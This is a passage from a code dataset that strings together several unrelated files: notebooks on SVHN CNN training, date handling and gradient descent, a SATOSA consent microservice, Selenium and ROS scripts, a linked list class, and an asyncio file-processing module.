3)\n self.conv2 = nn.Conv2d(10, 5, 
3)\n self.conv3 = nn.Conv2d(5, 16, 3)\n self.conv4 = nn.Conv2d(16, 24, 3)\n\n # Using Batch normalization on the convolution layers\n self.batchNorm2d_0 = nn.BatchNorm2d(10)\n self.batchNorm2d_1 = nn.BatchNorm2d(5)\n self.batchNorm2d_2 = nn.BatchNorm2d(16)\n self.batchNorm2d_3 = nn.BatchNorm2d(24)\n\n # 3 FC layers\n self.fc1 = nn.Linear(24 * 1 * 1, 128)\n self.fc2 = nn.Linear(128, 64)\n self.fc3 = nn.Linear(64, 10)\n \n def forward(self, x):\n x = F.max_pool2d(F.relu(self.batchNorm2d_0(self.conv1(x))), (2, 2))\n x = F.relu(self.batchNorm2d_1(self.conv2(x)))\n x = F.max_pool2d(F.relu(self.batchNorm2d_2(self.conv3(x))), (2, 2))\n x = F.max_pool2d(F.relu(self.batchNorm2d_3(self.conv4(x))), (2, 2))\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\n# + [markdown] id=\"ksWPM9kvYWmC\" colab_type=\"text\"\n# Write a code that trains the network with SVHN train dataset, for classification (use cross entropy, and SGD).\n# Run the network for at least 10 epochs, over the entire dataset. Make sure to print the loss over the train set as well as the **test set** over time (say, every 1000 batches, but it's up to you), so you will know where you are during training. \n#\n# Note, measuring loss of test is similar to measuring loss over the train test. However, make sure not to run the test images in back propagation. Use them only in forward and calulate the average loss over the entire test set. Since it will make the training process run slower, you should measure loss for the test set only at the end of an epoch (so overall you get 10 loss values for the test set). 
You are encoureged to write a different function for claculating the loss of the test set, and then call it from the training procedure.\n#\n#\n# You should collect the loss values in an array, so you can plot then into two curves, one for train and one for test.\n#\n# In addition, you should measure the time it takes you to train the network completely.\n#\n#\n\n# + id=\"LEfWQzWrOugS\" colab_type=\"code\" colab={}\ndef train(model, trainloader, testloader, criterion, optimizer, lr):\n \n train_losses, test_losses = [], []\n \n EPOCHS = 10\n\n # Count wall-clock time for the whole training process\n start_time = time()\n\n for epoch in range(EPOCHS):\n\n # Training mode\n model.train()\n\n sum_loss = 0.0\n running_loss = 0.0\n\n for batch_idx, (inputs, labels) in enumerate(trainloader):\n\n # Zero the gradients from the previous iteration\n optimizer.zero_grad()\n\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n # Forward pass\n outputs = model(inputs)\n\n # Compute Cross entropy loss\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n running_loss += loss.item()\n\n # Back propagation- computing the gradients\n loss.backward()\n\n # Update the parameters\n optimizer.step()\n\n if (batch_idx + 1) % 1000 == 0:\n current = running_loss / 1000\n train_losses.append(current)\n print(\"Epoch: {}/{}...\".format(epoch + 1, EPOCHS),\n \"Step: {}...\".format(batch_idx + 1),\n \"Train Loss: {:.3f}...\".format(current))\n running_loss = 0.0\n\n # Compute the loss on the training set in the current epoch\n train_loss = sum_loss / len(trainloader.dataset)\n\n # Compute the loss on the test set in the current epoch\n test_loss = calculate_test_loss(model, testloader, criterion)\n test_losses.append(test_loss)\n\n print(\"Epoch: {}/{}...\".format(epoch + 1, EPOCHS),\n \"Train Loss: {:.3f}...\".format(train_loss),\n \"Test Loss: {:.3f}\".format(test_loss))\n\n # Decay the learning rate every three epochs\n if (epoch + 1) % 3 == 0:\n lr /= 2\n for group in optimizer.param_groups:\n group['lr'] = lr\n print(\"It's epoch number {} and the new lr is {}\".format(epoch + 1, group['lr']))\n\n passed_time = time() - start_time\n print('The training ended after %.3f minutes' % (passed_time / 60))\n\n return epochs_train_loss, epochs_test_loss\n\n\n\n# + id=\"LDXNMRgmHxCM\" colab_type=\"code\" colab={}\ndef calculate_test_loss(model, data_loader, criterion):\n \n # Evaluation mode\n model.eval()\n\n sum_loss = 0.0\n\n with torch.no_grad():\n \n for batch_idx, (inputs, labels) in enumerate(data_loader):\n \n if torch.cuda.is_available():\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n # Forward pass\n outputs = model(inputs)\n\n # Compute Cross entropy loss\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n\n # Return the loss on the test set\n return sum_loss / len(data_loader.dataset)\n\n\n# + id=\"8f2VOhCVIZIA\" colab_type=\"code\" colab={}\ndef plot_graph(dataset, loss, folder):\n plt.title(\"Loss Over \" + dataset)\n\n label, color, ticks = (\n \"Number of batches seen / 1000\", 'blue', [i for i in range(0, 90 + 1, 9)]\n ) if dataset == 'Train' else (\"Epochs\", 'red', range(len(loss)))\n\n plt.plot(range(len(loss)), loss, label=dataset + ' Loss', color=color)\n\n plt.ylabel(\"Loss\")\n plt.xlabel(label)\n\n plt.xticks(ticks)\n plt.legend(frameon=False)\n plt.savefig(folder + '/' + \"Loss over \" + dataset + \".png\", dpi=192)\n plt.show()\n\n\n# + id=\"HvCmXl8oFcPe\" colab_type=\"code\" colab={}\ndef plot(folder_name, loss_train, loss_test):\n 
\n # Create a dir in the current working directory in which the generated\n # graphs will be saved\n output_dir = folder_name + \"_ results\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n print(\"\\t---------Results with \" + folder_name + \"---------\\n\")\n\n # Plotting the graphs for both training set and test set\n plot_graph(\"Train\", loss_train, output_dir)\n plot_graph(\"Test\", loss_test, output_dir)\n\n\n# + [markdown] id=\"Aa0sxqAhY8wA\" colab_type=\"text\"\n# Write a function that evaluates the resulted model over the entire test data of SVHN. Provide a single accuracy number.\n\n# + id=\"2DN1m6C4KaOS\" colab_type=\"code\" colab={}\n# Your code goes here\ndef calculate_accuracy(model, data_loader):\n \n correct = 0\n total = 0\n\n with torch.no_grad():\n\n for batch_idx, (inputs, labels) in enumerate(data_loader):\n\n if torch.cuda.is_available():\n inputs = inputs.cuda()\n\n # Forward pass\n outputs = model(inputs)\n outputs = outputs.detach().cpu()\n\n predictions = np.argmax(outputs.data, axis=1)\n\n total += labels.size(0)\n correct += (predictions == labels).sum().item()\n\n return 100 * correct / total\n\n\n# + [markdown] id=\"YFZXKnsqSgjy\" colab_type=\"text\"\n# # Training with a CPU \n#\n\n# + id=\"A2TlOyZGQAcA\" colab_type=\"code\" colab={}\nmodel_cpu = SVHNCnn()\n\n# + id=\"NA2JnWa_FMn6\" colab_type=\"code\" colab={}\n# Define loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Define the learning rate\nlr=0.004\n\n# Define the optimizer\noptimizer = torch.optim.SGD(model_cpu.parameters(), lr=lr,momentum=0.9)\n\n# + id=\"dsMDrH-KP5jb\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"1b312d2e-1177-4a6a-87f1-e550d368a880\"\n# Training with CPU\ncpu_train_loss, cpu_test_loss= train(model_cpu, trainloader, testloader,criterion, optimizer,lr)\n\n# + id=\"rCl4Xx4SVArr\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 607} outputId=\"847a9650-81c9-468b-d2ae-1a2a05e298cf\"\n# Plot the loss graphs\nplot(\"CPU\",cpu_train_loss, cpu_test_loss)\n\n# + id=\"vHHaXLcpVQ6T\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 51} outputId=\"de8e2c04-8e9d-4714-e59c-4927a9d0df97\"\n# Calculate the accuracies\nprint('Accuracy on the training set: %d%%\\nAccuracy on the test set: %d%%' \n % (calculate_accuracy(model_cpu,trainloader),calculate_accuracy(model_cpu,testloader)))\n\n# + [markdown] id=\"rMnb9gSGaIjP\" colab_type=\"text\"\n# # Training with a GPU \n# You are requested to change your code to use the GPU instead of the CPU.\n# This can be easily done bu converting every torch.tensor to torch.cuda.tensor. \n#\n# Specific instructions:\n# * Change the hardware equipent of your colab notebook. To do that, go to the \"Runtime\" menu, and then to \"Change runtime type\". 
In the dialog box, change \"Hardware accelerator\" to GPU.\n# * Please follow the lines that were commented out with the comment # -- For GPU (in notebook 11)\n# * Also, remove the lines that have the comment # -- For CPU\n#\n# Train your network again and compare training time.\n\n# + id=\"77G7gfj6Ok5B\" colab_type=\"code\" colab={}\nmodel_GPU = SVHNCnn().cuda()\n\n# + id=\"EnAE7izERyhD\" colab_type=\"code\" colab={}\n# Define loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Define the learning rate\nlr=0.004\n\n# Define the optimizer\noptimizer = torch.optim.SGD(model_GPU.parameters(), lr=lr,momentum=0.9)\n\n# + id=\"IGwB7SRtH52g\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"bcc49ddb-4c88-40a5-f17a-f543b51bea0e\"\n# Training with GPU\ngpu_train_loss, gpu_test_loss= train(model_GPU, trainloader, testloader,criterion, optimizer,lr)\n\n# + id=\"4oEGQ34PGKYZ\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 607} outputId=\"a21ac527-a0a9-48e5-cfaa-4df7bfbc6855\"\n# Plot the loss graphs\nplot(\"GPU\",gpu_train_loss, gpu_test_loss)\n\n# + id=\"2-sy7xDRI0Ap\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 51} outputId=\"6b1a2459-6dcb-4324-ac83-be8eadd2b6ef\"\n# Calculate the accuracies\nprint('Accuracy on the training set: %d%%\\nAccuracy on the test set: %d%%' \n % (calculate_accuracy(model_GPU,trainloader),calculate_accuracy(model_GPU,testloader)))\n\n# + [markdown] id=\"Vm5DnMate6s0\" colab_type=\"text\"\n# # Submission instructions\n#\n# You should submit a pdf file with the following items:\n#\n# CPU Experiment:\n# * Plot of loss curves (train in blue, test in red)\n# * Training time\n#\n# GPU Experiment:\n# * Plot of loss curves (train in blue, test in red)\n# * Training time\n#\n# Link for your collab notebook.\n# ID and names of submitters.\n#\n#\n# Good luck!\n","repo_name":"DorinK/Assignment-2-CNN-over-SVHN","sub_path":"Assignment_2_CNN_for_house_numbers.ipynb","file_name":"Assignment_2_CNN_for_house_numbers.ipynb","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"74419732244","text":"# Задание № 1\n# Напишите функцию date_range, которая возвращает список дней между датами start_date и end_date. Даты должны вводиться в формате YYYY-MM-DD.\n#\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef date_range(start_date, end_date):\n start_date = datetime.strptime(start_date, '%Y-%m-%d')\n end_date = datetime.strptime(end_date, '%Y-%m-%d')\n current_date = start_date\n while current_date <= end_date:\n print(current_date.strftime('%Y-%m-%d'))\n current_date += timedelta(days=1)\n\n\ndate_range('2018-05-01', '2018-06-01')\n\n\n# Задание № 2\n# Дополните функцию из первого задания проверкой на корректность дат. 
В случае неверного формата или если start_date > end_date должен возвращаться пустой список.\n#\n\ndef date_range_new(start_date, end_date):\n try:\n datetime.strptime(start_date, '%Y-%m-%d')\n datetime.strptime(end_date, '%Y-%m-%d')\n datetime.strptime(start_date, '%Y-%m-%d') < datetime.strptime(end_date, '%Y-%m-%d')\n start_date = datetime.strptime(start_date, '%Y-%m-%d')\n end_date = datetime.strptime(end_date, '%Y-%m-%d')\n current_date = start_date\n while current_date <= end_date:\n print(current_date.strftime('%Y-%m-%d'))\n current_date += timedelta(days=1)\n except:\n print([])\n\n\ndate_range_new('01-02-2018', '2018-07-01')\n\n# Задание № 3\n# Дан поток дат в формате YYYY-MM-DD, в которых встречаются некорректные значения:\n# stream = ['2018-04-02', '2018-02-29', '2018-19-02']\n# Напишите функцию, которая проверяет эти даты на корректность. Т. е. для каждой даты возвращает True (дата корректна) или False (некорректная дата). \n#\n\nstream = ['2018-04-02', '2018-02-29', '2018-19-02']\ndef date_chek(line):\n for date in line:\n try:\n datetime.strptime(date, '%Y-%m-%d')\n print(date, 'Дата корректна')\n except:\n print(date, 'Некорректная дата')\n\n\ndate_chek(stream)\n\n# Задание № 5\n# В последнем примере поиска по словарю мы использовали 3 столбца. Напишите функцию, которая формирует словарь для поиска по n столбцам.\n\nline_to_find = ('20', '20552')\ndef finder(file, n):\n stats_dict = {}\n with open(file) as f:\n for line in f:\n line = line.strip().split(',')\n stats_dict[tuple(line[:n])] = line[n]\n cost = stats_dict[line_to_find]\n print(cost)\n\n\nfinder('stats.csv', 2)\n","repo_name":"Vanek89/netology_pyda","sub_path":"Homework_9_Bogomolov.ipynb","file_name":"Homework_9_Bogomolov.ipynb","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"70772325845","text":"# ## Loss function\n# The loss is the error in our predicted of m and c. Our goal is to minimize this error to obtain the most accurance value of m and c.\n# We will use the Mean Squared Error function to calculate the loss. There are three steps in this function:\n#\n# Find the difference between the actual y and predicted y value(y = mx + c), for a given x.\n# Square this difference.\n# Find the mean of the squares for every value in X.\n# $$ E = \\frac{1}{n} \\sum_{i=0}^n (y_i - \\bar y_i)^2$$\n# Here $y_i$ is the actual value and $\\bar y_i$ is the predicted value. Lets substitue the value of $\\bar y_i$$$ E = \\frac{1}{n} \\sum_{i=0}^n (y_i - (mx_i + c))^2$$So we square the error and find the mean. hence the name Mean Squared Error.\n# Now that we have defined the loss function, lets get into the interesting part - minimizing it and finding m and c\n\n# # Gradient Descent\n# Gradient descent is an optimization algorithm used to find the values of parameters (coefficients) of a function (f) that minimizes a cost function (cost).\n# applying gradient descent Logic to m and c and approach it step by step:\n#\n# Initially let m = 0 and c = 0. Let L be our learning rate. This controls how much the value of m changes with each step. 
L could be a small value like 0.0001 for good accuracy.\n# Calculate the partial derivative of the loss function with respect to m, and plug in the current values of x, y, m and c in it to obtain the derivative value D.\n# $$ D_m = \\frac{1}{n} \\sum_{i=0}^n 2(y_i - (mx_i + c))(-x_i) $$$$ D_m = \\frac{-2}{n} \\sum_{i=0}^n x_i(y_i - \\bar y_i) $$\n# $D_m$ is the value of the partial derivative with respect to m. Similarly lets find the partial derivative with respect to c, $D_c$ :\n# $$ D_c = \\frac{-2}{n} \\sum_{i=0}^n (y_i - \\bar y_i) $$\n# Now we update the current value of m and c using the following equation:$$ m = m - L \\times D_m$$\n# $$ c = c - L \\times D_c$$\n# We repeat this process untill our loss function is a very small value or ideally 0 (which means 0 error or 100% accuracy). The value of m and c that we are left with now will be the optimum values.\n\n# +\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (12.0, 9.0)\n\n# Preprocessing Input data\ndata = pd.read_csv('dataGD.csv')\nX = data.iloc[:, 0]\nY = data.iloc[:, 1]\nplt.scatter(X, Y)\nplt.show()\n\n# +\n# Building the model\nm = 0\nc = 0\n\nL = 0.0001 # The learning Rate\nepochs = 1000 # The number of iterations to perform gradient descent\n\nn = float(len(X)) # Number of elements in X\n\n# Performing Gradient Descent \nfor i in range(epochs): \n Y_pred = m*X + c # The current predicted value of Y\n D_m = (-2/n) * sum(X * (Y - Y_pred)) # Derivative wrt m\n D_c = (-2/n) * sum(Y - Y_pred) # Derivative wrt c\n m = m - L * D_m # Update m\n c = c - L * D_c # Update c\n \nprint (m, c)\n\n# +\n# Making predictions\nY_pred = m*X + c\n\nplt.scatter(X,Y)\nplt.scatter(X,Y_pred)\nplt.show()\n# -\n\nplt.scatter(X, Y)\nplt.plot([min(X), max(X)], [min(Y_pred), max(Y_pred)], color='red') # predicted\nplt.show()\n\n\n","repo_name":"Laukit13/Machine-Learning-Projects","sub_path":"Linear Regg with Gradient Descent.ipynb","file_name":"Linear Regg with Gradient Descent.ipynb","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"30024039495","text":"import gettext\n\nimport pkg_resources\nfrom mako.lookup import TemplateLookup\nfrom satosa.exception import SATOSAAuthenticationError\nfrom satosa.internal_data import InternalResponse\nfrom satosa.micro_services import consent\nfrom satosa.micro_services.base import ResponseMicroService\nfrom satosa.response import Response\n\n\ndef N_(s):\n \"\"\"\n Dummy function to mark strings for translation, but defer the actual translation for later (using the real \"_()\").\n :param s:\n :return:\n \"\"\"\n return s\n\n\nclass UserConsent(ResponseMicroService):\n \"\"\"\n Select which backend should be used based on what the OIDC scope is.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor.\n \"\"\"\n super().__init__(*args, **kwargs)\n\n self.endpoint = '/handle_consent'\n self.template_lookup = TemplateLookup(directories=[pkg_resources.resource_filename('svs', 'templates/')])\n\n def _find_requester_name(self, requester_name, language):\n return requester_name\n # requester_names = {entry['lang']: entry['text'] for entry in requester_name}\n # # fallback to english, or if all else fails, use the first entry in the list of names\n # fallback = requester_names.get('en', requester_name[0]['text'])\n # return requester_names.get(language, fallback)\n\n def _attributes_to_release(self, internal_response):\n attributes 
= {\n N_('Affiliation'): internal_response.attributes['affiliation'],\n N_('Identifier'): internal_response.user_id,\n N_('Authentication time'): internal_response.auth_info.timestamp\n }\n if 'domain' in internal_response.attributes:\n attributes[N_('Domain')] = internal_response.attributes['domain']\n\n return attributes\n\n def render_consent(self, internal_response, language='en'):\n requester_name = self._find_requester_name(internal_response.requester, language)\n gettext.translation('messages', localedir=pkg_resources.resource_filename('svs', 'data/i18n/locale'),\n languages=[language]).install()\n\n released_attributes = self._attributes_to_release(internal_response)\n template = self.template_lookup.get_template('consent.mako')\n page = template.render(client_name=requester_name,\n released_attributes=released_attributes,\n form_action='/consent{}'.format(self.endpoint),\n language=language)\n\n return Response(page, content='text/html')\n\n def process(self, context, internal_response):\n \"\"\"\n Ask the user for consent of data to be released.\n :param context: request context\n :param internal_response: the internal response\n \"\"\"\n consent_state = context.state[consent.STATE_KEY]\n internal_response.attributes = {k: v for k, v in internal_response.attributes.items() if\n k in consent_state['filter']}\n\n context.state[self.name] = {'internal_response': internal_response.to_dict()}\n return self.render_consent(internal_response)\n\n def accept_consent(self, context):\n \"\"\"\n Endpoint for handling accepted consent.\n :type context: satosa.context.Context\n :rtype: satosa.response.Response\n\n :param context: response context\n :return: response\n \"\"\"\n consent_state = context.state[self.name]\n saved_resp = consent_state['internal_response']\n internal_response = InternalResponse.from_dict(saved_resp)\n del context.state[self.name]\n return super().process(context, internal_response)\n\n def deny_consent(self, context):\n \"\"\"\n Endpoint for handling denied consent.\n :type context: satosa.context.Context\n :rtype: satosa.response.Response\n\n :param context: response context\n :return: response\n \"\"\"\n del context.state[self.name]\n raise SATOSAAuthenticationError(context.state, 'Consent was denied by the user.')\n\n def change_language(self, context):\n consent_state = context.state[self.name]\n saved_resp = consent_state['internal_response']\n internal_response = InternalResponse.from_dict(saved_resp)\n\n lang = context.request.get('lang', 'en')\n return self.render_consent(internal_response, lang)\n\n def register_endpoints(self):\n base = '^consent{}'.format(self.endpoint)\n url_map = []\n url_map.append(('{}$'.format(base), self.change_language))\n url_map.append(('{}/allow'.format(base), self.accept_consent))\n url_map.append(('{}/deny'.format(base), self.deny_consent))\n return url_map\n","repo_name":"SUNET/svs","sub_path":"src/svs/user_consent.py","file_name":"user_consent.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33623810994","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .driver_config import BROWSER, REMOTE_IP, REMOTE_PORT\n\nBROWSERS = {\n 'chrome': webdriver.Chrome,\n 'remote': webdriver.Remote\n}\n\n\nclass Driver:\n def __init__(self, **kwgs):\n self.kwgs = kwgs\n if BROWSER == 'chrome':\n self.kwgs['executable_path'] = ChromeDriverManager().install()\n options = 
webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n self.kwgs['options'] = options\n\n if BROWSER == 'remote':\n self.kwgs['command_executor'] = f'http://{REMOTE_IP}:{REMOTE_PORT}/wd/hub'\n options = webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n self.kwgs['desired_capabilities'] = options.to_capabilities()\n\n def start(self):\n driver = BROWSERS[BROWSER](**self.kwgs)\n return driver\n","repo_name":"IlyaKnysh/pytest-bdd-demo","sub_path":"core/config/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18885690997","text":"from .nodo import Nodo\n\n\nclass Lista:\n\n\tdef __init__(self):\n\t\tself.__primero = None\n\t\tself.__ultimo = None\n\n############################################### vacio #############################################\n\n\tdef vacio(self):\n\t\tif self.__primero == None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n######################################### agregar ##############################################\n\n\tdef agregar(self,id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño):\n\t\tif self.vacio(): # verificar si esta vacia \n\t\t\tself.__primero = self.__ultimo = Nodo(id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño)\n\t\telse:# no esta vacio \n\t\t\tnuevo = Nodo(id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño)\n\t\t\tself.__ultimo.siguiente = nuevo\n\t\t\tnuevo.anterior = self.__ultimo\n\t\t\tself.__ultimo = nuevo\n\n########################################### eliminar #######################################\n\n\tdef eliminar(self,id):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tif aux.id ==id:\n\t\t\t\t\tif self.__primero == self.__ultimo:\n\t\t\t\t\t\tself.__primero = self.__ultimo = None\n\t\t\t\t\telif aux == self.__primero:\n\t\t\t\t\t\tself.__primero = aux.siguiente\n\t\t\t\t\t\tself.__primero.anterior = None\n\t\t\t\t\t\taux.siguiente = None\n\t\t\t\t\telif aux == self.__ultimo:\n\t\t\t\t\t\tself.__ultimo = aux.anterior\n\t\t\t\t\t\tself.__ultimo.siguiente = None\n\t\t\t\t\t\taux.anterior = None\n\t\t\t\t\telse:\n\t\t\t\t\t\taux.anterior.siguiente = aux.siguiente\n\t\t\t\t\t\taux.siguiente.anterior = aux.anterior\n\t\t\t\t\t\taux.siguiente = None\n\t\t\t\t\t\taux.anterior = None\n\t\t\t\t\treturn aux\n\t\t\t\taux = aux.siguiente\n\t\treturn None\n\n\t\t\t\t\t\n\n############################################### buscar ##############################################\n\n\tdef buscar(self, id):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tif aux.id == id:\n\t\t\t\t\treturn aux\n\t\t\t\t\tbreak\n\t\t\t\taux = aux.siguiente\n\n\tdef registros(self):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tyield aux\n\t\t\t\taux = aux.siguiente\n\n######################################## imprimir ############################################\n\n\tdef imprimir(self): \n\t\taux = self.__primero\n\t\twhile aux:\n\t\t\tprint(aux.id,aux.nombreOponente,aux.tirosRealizados,aux.tirosAcertados,aux.tirosFallados,aux.ganoPerdido,aux.daño)\n\t\t\taux = 
aux.siguiente\n","repo_name":"AlejandroMolinaReyes/ProyectoJunio2017_201020787","sub_path":"ProyectoEDD/estructuras/lista/lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27597670326","text":" #!/usr/bin/env python\n\nimport rospy\n\nimport tf2_ros\n\nfrom line_detector.srv import NextPositionInLineService\nfrom gazebo_msgs.msg import ModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom geometry_msgs.msg import Pose, Twist\nfrom tf2_geometry_msgs import PoseStamped\n\n\nrospy.init_node('DEMO_NODE')\n\nprint(\"waiting for services\")\nrospy.wait_for_service('line_detection_service')\nprint(\"got line service\")\nrospy.wait_for_service('gazebo/set_model_state')\nprint(\"got gazebo service\")\n\nline_srv = rospy.ServiceProxy('line_detection_service', NextPositionInLineService)\nteleport_srv = rospy.ServiceProxy('gazebo/set_model_state', SetModelState)\n\nprint(\"setting tf buffer\")\ntfBuffer = tf2_ros.Buffer()\nlistener = tf2_ros.TransformListener(tfBuffer)\n\nprint(\"submitting request\")\nresult = line_srv(1.0, \"ltr\")\nprint(\"got it!\")\nprint(result.next_position)\n\nprint(\"converting to map frame\")\n\n# Assuming the world is static, you could use this fix. Which will force the coordinates transformation to use the last data which there is on the frame, without respect to the time period.\nresult.next_position.header.stamp = rospy.Time(0)\n\ninput_pose = PoseStamped(result.next_position.header, result.next_position.pose)\nconverted_pose = tfBuffer.transform(input_pose, 'map').pose\nconverted_pose.position.z = 0 # ground the position\n\n# A fix for the angle transformation, for the case which the \"/kinect2/qhd/points\" frame is not parallel to the \"map\" frame Z axis\nangle_temp = tf.transformations.euler_from_quaternion((converted_pose.orientation.x,converted_pose.orientation.y,converted_pose.orientation.z,converted_pose.orientation.w))\nconverted_pose.orientation = Quaternion(*tf.transformations.quaternion_from_euler(0,0,angle_temp[2]))\n\nprint(converted_pose)\n\ntwist = Twist()\nmodel_name = \"armadillo2\"\n\ndesired_state = ModelState(model_name, converted_pose, twist, 'map')\nprint(\"teleporting! That probably messes with the transform tree...\")\nteleport_srv(desired_state)\n\npass\n\n\n","repo_name":"EyalSeg/line_detector","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71923262404","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path(\"\", views.questions_list, name=\"questions_list\"),\n path(\"add/\", views.add_question, name=\"add_question\"),\n path(\"/delete/\", views.delete_question, name=\"delete_question\"),\n path(\"/question_detail/\", views.question_detail, name=\"question_detail\"),\n path(\"/add_answer/\", views.add_answer, name=\"add_answer\"),\n # path('search/', views., name='')\n]\n","repo_name":"momentum-team-3/questionbox-kldavis52","sub_path":"qanda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4313030298","text":"import asyncio\nimport concurrent.futures\nimport enum\nimport multiprocessing\nfrom asyncio import Queue\n\nfrom aiomultiprocess import Pool\n\nfrom file_handler import handle_file\n\n\nclass TaskHandleType(enum.Enum):\n asyncio = 'asyncio'\n bounded_semaphore = 'bounded_semaphore'\n multi_process = 'multi_process'\n aiomultiprocess = 'aiomultiprocess'\n process_pool_executor = 'process_pool_executor'\n\n\nmode = TaskHandleType.asyncio\n\n\nasync def __handle_file_with_semaphore__(file_path: str, new_file_path: str, semaphore):\n async with semaphore:\n await handle_file(file_path, new_file_path)\n\n\nasync def __handle_tasks_semaphore__(queue: Queue):\n semaphore = asyncio.BoundedSemaphore(50)\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append(__handle_file_with_semaphore__(file_path, new_file_path, semaphore))\n\n await asyncio.gather(*tasks)\n\n\ndef __process_task__(file_path, new_file_path):\n asyncio.run(handle_file(file_path, new_file_path))\n\n\ndef __process_task__arg(args):\n file_path, new_file_path = args\n asyncio.run(handle_file(file_path, new_file_path))\n\n\ndef __handle_tasks_multi_process__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append((file_path, new_file_path))\n\n with multiprocessing.Pool() as pool:\n pool.map(__process_task__, tasks)\n\n\nasync def __handle_task__(args):\n file_path, new_file_path = args\n await handle_file(file_path, new_file_path)\n\n\nasync def __handle_tasks_aiomultiprocess__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append((file_path, new_file_path))\n\n async with Pool() as pool:\n await pool.map(__handle_task__, tasks)\n\n\nasync def __handle_tasks_process_pool_executor__(queue):\n file_paths = []\n new_file_paths = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n file_paths.append(file_path)\n new_file_paths.append(new_file_path)\n\n with concurrent.futures.ProcessPoolExecutor() as executor:\n results = executor.map(__process_task__, file_paths, new_file_paths)\n\n\nasync def __handle_tasks_asyncio__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append(asyncio.create_task(handle_file(file_path, new_file_path)))\n\n await asyncio.gather(*tasks)\n\n\nasync def handle_tasks(queue: Queue):\n if mode == TaskHandleType.asyncio:\n await __handle_tasks_asyncio__(queue)\n return\n\n if mode == TaskHandleType.bounded_semaphore:\n await __handle_tasks_semaphore__(queue)\n return\n\n if mode == TaskHandleType.multi_process:\n __handle_tasks_multi_process__(queue)\n return\n\n if mode == TaskHandleType.aiomultiprocess:\n await __handle_tasks_aiomultiprocess__(queue)\n return\n\n if mode == 
